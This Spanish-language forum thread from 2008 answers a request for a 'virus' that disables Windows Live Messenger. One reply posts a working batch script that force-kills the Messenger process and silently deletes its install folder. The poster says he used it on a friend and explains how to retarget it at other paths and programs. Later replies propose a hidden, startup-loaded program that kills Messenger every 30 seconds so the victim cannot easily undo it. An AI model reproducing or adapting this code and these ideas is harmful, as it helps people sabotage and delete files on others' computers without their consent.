| Ver tema anterior :: Ver siguiente tema |
| Autor |
Mensaje |
kabron15 Nuevo Miembro

|
Publicado: Vie Oct 31, 2008 8:47 pm Título del mensaje: como se crea un virus? |
|
|
me podrian enseñar como hacer un virus que al ejecutarlo cierre el windows live (messenger) y ya no lo deje abrir.?  |
|
|
 |
paulo-2803 Yo soy el foro

|
Publicado: Vie Oct 31, 2008 9:11 pm Título del mensaje: |
|
|
mmm, yo se hacer de esos, pero no es virus, es un batch (.bat), lo que le pongo es que cierre el proceso y borre la carpeta del WLM.
pero no se si reinstalandolo se resuelva, se lo hice a un amigo y no ha aparecido por msn xD
si quieres el code, postea de nuevo xD
saludos _________________
|
|
|
 |
javi_606 User destacando

|
Publicado: Sab Nov 01, 2008 1:03 am Título del mensaje: |
|
|
no estaría mal que nos mostraras el code o pasarnoslo por privado para echarle un vistazo.  _________________ "Con las piedras que con duro intento los críticos te lanzan, bien puedes erigirte un monumento"
-- KANT -- |
|
|
 |

|
Publicado: Sab Nov 01, 2008 2:01 am Título del mensaje: |
|
|
no es necesario hacerlo por MP
aqui esta el code:
@echo off
taskkill /f /im msnmsgr.exe
cls
msg* "Windows Live Messenger Cerrado"
del /s /q "C:\Archivos de programa\Windows Live\Messenger"
cls
msg* "Windows Live Messenger borrado exitosamente "
msg* "By.: Rabbit D..... RD"
pause
exit
Si quieren pueden probar cambiando los codigos marcados en azul.
lo que esta en c:\...... es la ruta de la carpeta, pueden probar con otro para borrar un archivo menos importante.
los que estan despues de msg* son mini popups que pueden cambiar
y el msnmsgr.exe es el nombre del proceso a cerrar, pueden cambiarlo por el de winrar o alguno que no sea necesario..
|
|
|
 |
DploiD Yo soy el foro

|
Publicado: Sab Nov 01, 2008 4:39 pm Título del mensaje: |
|
|
Cierras el proceso y eliminas el ejecutable de MSN, pero no sería un virus. Creas un ejecutable en lugar del de MSN y lo ejecutas, para que el original no pueda reemplazarlo de nuevo.
Para ser un virus debe propagarse por su cuenta, y debe contar con funciones de protección para evitar ser borrado y demás.
Un saludo. _________________ Avisame del spam
O postealo acá |
|
|
 |

|
Publicado: Sab Nov 01, 2008 7:36 pm Título del mensaje: |
|
|
mmm si DploiD, pero me gusta mas borrarle la carpeta entera, y asi no borra las entradas del registro y no puede ser instalado nuevamente xD
|
|
|
 |
perezd Yo soy el foro

|
Publicado: Dom Nov 02, 2008 1:10 am Título del mensaje: |
|
|
Teoricamente deberia funcionar no? Ahora me parece muy casero eso
Seria mas efectivo si se desabilitara completamente el software desde el registro _________________ "El Software es Como el Sexo, Cuando es Gratis, Mejor"
Tutoriales, Guias, Problemas y Dudas sobre GNU/Linux - Foro Linux
|
|
|
 |
Dark Knight Yo soy el foro

|
Publicado: Dom Nov 02, 2008 1:45 am Título del mensaje: |
|
|
Menos coña que yo en clase de Batch la cagé al programar uno y se me cargó casi todas las carpetas del disco duro T_T...eso se lo envias a otra persona y la desgracias jajaja _________________ Mis PC's:
|
|
|
 |

|
Publicado: Dom Nov 02, 2008 2:17 am Título del mensaje: |
|
|
mm bueno, si funciona, perezd, lo que trato de decir, es que el msn ya no esta presente hablando en archivos, pero al abrir el installer, el mismo revisara que este instalado por medio de las entradas del registro xD
asi que no podra reinstalar....
xD
|
|
|
 |
Masher Conociendo Foroz

|
Publicado: Dom Nov 02, 2008 12:28 pm Título del mensaje: |
|
|
Eso no es del todo cierto, Messenger live se instala con Windows Instaler 3.1 y lo que hace es comprobar no solo el registro sino también la carpeta de instalación, con lo que al encontrar el fallo nos dará la opción de reparar, y todo seguirá funcionando a la perfección...
Yo lo que haría sería un programilla en Visual C o Visual Basic que cargue un nuevo proceso que el propio programa crea, que cada 30 segundos por ejemplo (o lo que queramos usando un control timer) mire la lista de procesos abiertos y si está el messenger entre ello que lo elimine (kill process)...
De esta manera, da igual que reinstales messenger, s te aseguras de que tu proceso se carga al iniciar windows, el messenger solo funcionará como máximo 30 segundos (o el tiempo que le hayas marcado) antes de cerrarse automaticamente...
Y si te lo curras bien y ocultas ese proceso, y la otra persona no tiene mucha "idea" del tema... le costará solucionarlo.
un saludo. _________________ Todos somos unos ignorantes, lo que pasa es que no todos ignoramos las mismas cosas. |
|
|
 |
|
|
|